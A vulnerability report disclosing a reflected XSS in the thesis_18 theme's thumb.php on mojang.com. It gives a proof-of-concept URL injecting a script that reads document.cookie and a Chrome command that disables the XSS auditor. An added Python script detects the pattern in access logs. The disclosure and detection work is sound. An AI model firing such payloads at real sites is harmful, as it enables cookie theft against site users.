Reflected XSS vulnerability on mojang.com
On mojang.com there is a reflected XSS vulnerability located inside the thesis_18 theme.
Proof of concept.
Open, for example, the Chrome browser with the XSS auditor disabled:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor
Then use the exploit URL below:
https://mojang.com/wp-content/themes/thesis_18/lib/scripts/thumb.php?src=%3Cscript%3Ealert(document.cookie);%3C/script%3E
You can see the exploit in action in the attachment.
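As an added example (not part of the original report), the following Python script scans web-server access-log lines for requests to thumb.php whose src parameter, once URL-decoded, contains markup, which is the reflection pattern reported above; the log lines and IP addresses in it are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Extracts the request target from a combined-log-format line (sample lines below are constructed).
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup that should never appear in an image path: a tag, an inline event handler, a javascript: URL.
MARKUP_RE = re.compile(r'<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript:', re.I)

def query_params(query):
    """Decode a query string into {name: [values]} with one decode pass, as the server does."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def suspicious_src(target):
    """Return the decoded src value when a thumb.php request carries markup in it, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/thumb.php'):
        return None
    for value in query_params(parts.query).get('src', []):
        if MARKUP_RE.search(value):
            return value
    return None

def scan_log(lines):
    """Return (line_number, decoded_src) for every request matching the reflected-XSS pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            value = suspicious_src(m.group(1))
            if value is not None:
                hits.append((n, value))
    return hits

# Constructed sample log: a legitimate thumbnail request, an unrelated page, and the PoC request.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jan/2014:10:00:01 +0000] "GET /wp-content/themes/thesis_18/lib/scripts/thumb.php?src=/wp-content/uploads/logo.png&w=120&h=80 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [01/Jan/2014:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [01/Jan/2014:10:00:03 +0000] "GET /wp-content/themes/thesis_18/lib/scripts/thumb.php?src=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for n, value in scan_log(SAMPLE_LOG):
        print(f'line {n}: reflected markup in thumb.php src -> {value!r}')
```

A matching line is worth checking against the response size as well: the reflected payload being echoed back unencoded is what turns a suspicious request into a confirmed hit.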
If you have any other questions feel free to ask.
Greetings,
Kacper Szurek